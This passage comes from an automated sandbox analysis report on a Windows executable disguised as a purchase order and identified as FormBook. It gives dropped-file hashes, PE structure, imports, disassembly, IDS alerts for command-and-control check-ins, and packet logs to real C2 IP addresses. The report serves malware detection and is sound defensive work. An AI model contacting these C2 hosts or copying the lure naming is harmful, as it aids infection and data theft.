                      REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\7466H3538

                      Download File
                      Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                      File Type:Unknown
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\aut869C.tmp

                      Download File
                      Process:C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9928654846322695
                      Encrypted:true
                      SSDEEP:6144:O04RG+ScBf7ccnHbCHj4BOB5BfAyE6YokfF28O+zXr+G:O0zcBzccHkkBOzzWok3vX6G
                      MD5:7E201B4F5F00B0D855826B258537AC4F
                      SHA1:CDC09A216D7494ED4ABF45D280F70D298A0540FF
                      SHA-256:51C02AD299D3845C815079FD07BB8E7163A6AF7228166725A027433CD2CC50C9
                      SHA-512:0499945B3ABC9FD9D16588C5A256046981AB58F33CA9FF93C94E27AE3F10CAF3A541B556BCED1B27506FB52D92B75DD90B16F43E5C0AA7F9A0C056B09192F038
                      Malicious:false
                      Reputation:low
                      Preview:..q..33SU...Z.....SV...{E<...3SUYW8SF4JN33SUYW8SF4JN33SUYW8.F4J@,.]U.^.r.5...g;<*wH!)S8/^.0479W'fV/nAF=u09...gj#\W6{TZ2wF4JN33S,X^.n&S.sST.h90.I...tST.O...o&S.T...i90../W"sST.UYW8SF4J.v3S.XV8..O(N33SUYW8.F6KE28SU.S8SF4JN33S.MW8SV4JNC7SUY.8SV4JN13SSYW8SF4JH33SUYW8S60JN13SUYW8QFt.N3#SUIW8SF$JN#3SUYW8CF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8}2Q2:33S..S8SV4JNe7SUIW8SF4JN33SUYW8sF4*N33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4J

                      C:\Users\user\AppData\Local\Temp\endochylous

                      Download File
                      Process:C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9928654846322695
                      Encrypted:true
                      SSDEEP:6144:O04RG+ScBf7ccnHbCHj4BOB5BfAyE6YokfF28O+zXr+G:O0zcBzccHkkBOzzWok3vX6G
                      MD5:7E201B4F5F00B0D855826B258537AC4F
                      SHA1:CDC09A216D7494ED4ABF45D280F70D298A0540FF
                      SHA-256:51C02AD299D3845C815079FD07BB8E7163A6AF7228166725A027433CD2CC50C9
                      SHA-512:0499945B3ABC9FD9D16588C5A256046981AB58F33CA9FF93C94E27AE3F10CAF3A541B556BCED1B27506FB52D92B75DD90B16F43E5C0AA7F9A0C056B09192F038
                      Malicious:false
                      Reputation:low
                      Preview:..q..33SU...Z.....SV...{E<...3SUYW8SF4JN33SUYW8SF4JN33SUYW8.F4J@,.]U.^.r.5...g;<*wH!)S8/^.0479W'fV/nAF=u09...gj#\W6{TZ2wF4JN33S,X^.n&S.sST.h90.I...tST.O...o&S.T...i90../W"sST.UYW8SF4J.v3S.XV8..O(N33SUYW8.F6KE28SU.S8SF4JN33S.MW8SV4JNC7SUY.8SV4JN13SSYW8SF4JH33SUYW8S60JN13SUYW8QFt.N3#SUIW8SF$JN#3SUYW8CF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8}2Q2:33S..S8SV4JNe7SUIW8SF4JN33SUYW8sF4*N33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4JN33SUYW8SF4J

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.157259766896894
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      File size:1'220'608 bytes
                      MD5:c029364519d917e71ec6e8be9301755b
                      SHA1:edbf0638c76e9ab5d26f84d98c94b23757685da1
                      SHA256:ecde745484cbfc4aa7ff0de292907acd4bab3b772641f09815030a2d0887073f
                      SHA512:b5ba60655171c7a37b62441e930c485901b54a9f7c91aa360f351c8dde1c199658068ae8e5b169ceeb7e73b7842753206214c5bcf019c6ed93d194ebd4ace7e6
                      SSDEEP:24576:c4lavt0LkLL9IMixoEgea12A1z7HyRvmDQ7NdI6q9MmCS:rkwkn9IMHea12KX6vm4NtaPCS
                      TLSH:A345CF0373DE83A5C3725273BA65BB01AE7B7C2506B1F59B2FD5093DE960122421EA73
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                      File Icon

                      Icon Hash:aaf3e3e3938382a0

                      Static PE Info

                      General

                      Entrypoint:0x426bf7
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66DF84BD [Mon Sep 9 23:29:01 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:bbac62fd99326ea68ec5a33b36925dd1

                      Entrypoint Preview

                      Instruction
                      call 00007F5BD507920Ch
                      jmp 00007F5BD506C0F4h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007F5BD506C27Ah
                      cmp edi, eax
                      jc 00007F5BD506C5DEh
                      bt dword ptr [004C0158h], 01h
                      jnc 00007F5BD506C279h
                      rep movsb
                      jmp 00007F5BD506C58Ch
                      cmp ecx, 00000080h
                      jc 00007F5BD506C444h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007F5BD506C280h
                      bt dword ptr [004BA370h], 01h
                      jc 00007F5BD506C750h
                      bt dword ptr [004C0158h], 00000000h
                      jnc 00007F5BD506C41Dh
                      test edi, 00000003h
                      jne 00007F5BD506C42Eh
                      test esi, 00000003h
                      jne 00007F5BD506C40Dh
                      bt edi, 02h
                      jnc 00007F5BD506C27Fh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007F5BD506C283h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007F5BD506C2D5h

                      Rich Headers

                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2012 UPD4 build 61030
                      • [RES] VS2012 UPD4 build 61030
                      • [LNK] VS2012 UPD4 build 61030

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b6c0x17c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x60a3c.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c20.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27700x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x858.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x8be740x8c00074af66fa540568c59b3868e78900e476False0.5690970284598215data6.681489717174931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x8d0000x2c76a0x2c800576c856afaad699ad9fe099fc6a9ce33False0.33122476299157305zlib compressed data5.781163507108141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xba0000x9f340x6200e6d2e204147f7cdc3055011093632f54False0.1639030612244898data2.004392861291539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xc40000x60a3c0x60c001d8e2936d954a8cc8349119313da7cbaFalse0.9315422117248062data7.903384825630104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x1250000xa4620xa600c2f6ddaeef894b7510c3be928eeae5ddFalse0.5080948795180723data5.238496692777452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                      RT_RCDATA0xcc7b80x57ce5data1.0003225331083017
                      RT_GROUP_ICON0x1244a00x76dataEnglishGreat Britain0.6610169491525424
                      RT_GROUP_ICON0x1245180x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0x12452c0x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0x1245400x14dataEnglishGreat Britain1.25
                      RT_VERSION0x1245540x138dataEnglishGreat Britain0.5961538461538461
                      RT_MANIFEST0x12468c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                      Imports

                      DLLImport
                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                      PSAPI.DLLGetProcessMemoryInfo
                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                      UxTheme.dllIsThemeActive
                      KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                      USER32.dllCopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-10T08:48:13.436745+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973647.57.185.22780TCP
                      2024-09-10T08:48:37.031525+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974189.58.49.180TCP
                      2024-09-10T08:48:59.099041+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449745154.23.184.24080TCP
                      2024-09-10T08:49:12.745705+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974985.159.66.9380TCP
                      2024-09-10T08:49:26.732425+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449753185.173.111.7680TCP
                      2024-09-10T08:49:40.352802+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449757203.161.43.22880TCP
                      2024-09-10T08:49:53.716519+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449761161.97.168.24580TCP
                      2024-09-10T08:50:11.450675+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449765172.96.191.3980TCP
                      2024-09-10T08:50:24.780304+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449769104.21.20.12580TCP
                      2024-09-10T08:50:38.980037+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44977343.242.202.16980TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 10, 2024 08:48:12.514228106 CEST4973680192.168.2.447.57.185.227
                      Sep 10, 2024 08:48:12.519130945 CEST804973647.57.185.227192.168.2.4
                      Sep 10, 2024 08:48:12.519208908 CEST4973680192.168.2.447.57.185.227
                      Sep 10, 2024 08:48:12.525230885 CEST4973680192.168.2.447.57.185.227
                      Sep 10, 2024 08:48:12.530220985 CEST804973647.57.185.227192.168.2.4
                      Sep 10, 2024 08:48:13.436589003 CEST804973647.57.185.227192.168.2.4
                      Sep 10, 2024 08:48:13.436609030 CEST804973647.57.185.227192.168.2.4
                      Sep 10, 2024 08:48:13.436744928 CEST4973680192.168.2.447.57.185.227
                      Sep 10, 2024 08:48:13.440035105 CEST4973680192.168.2.447.57.185.227
                      Sep 10, 2024 08:48:13.444891930 CEST804973647.57.185.227192.168.2.4
                      Sep 10, 2024 08:48:28.544707060 CEST4973780192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:28.549674034 CEST804973789.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:28.549889088 CEST4973780192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:28.559892893 CEST4973780192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:28.564903975 CEST804973789.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:29.177470922 CEST804973789.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:29.177489042 CEST804973789.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:29.177809000 CEST4973780192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:30.062835932 CEST4973780192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:31.080816031 CEST4973880192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:31.289438963 CEST804973889.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:31.293158054 CEST4973880192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:31.301776886 CEST4973880192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:31.309379101 CEST804973889.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:31.928316116 CEST804973889.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:31.928344965 CEST804973889.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:31.928495884 CEST4973880192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:32.812773943 CEST4973880192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:33.830862045 CEST4974080192.168.2.489.58.49.1
                      Sep 10, 2024 08:48:33.835957050 CEST804974089.58.49.1192.168.2.4
                      Sep 10, 2024 08:48:33.836064100 CEST4974080192.168.2.489.58.49.1
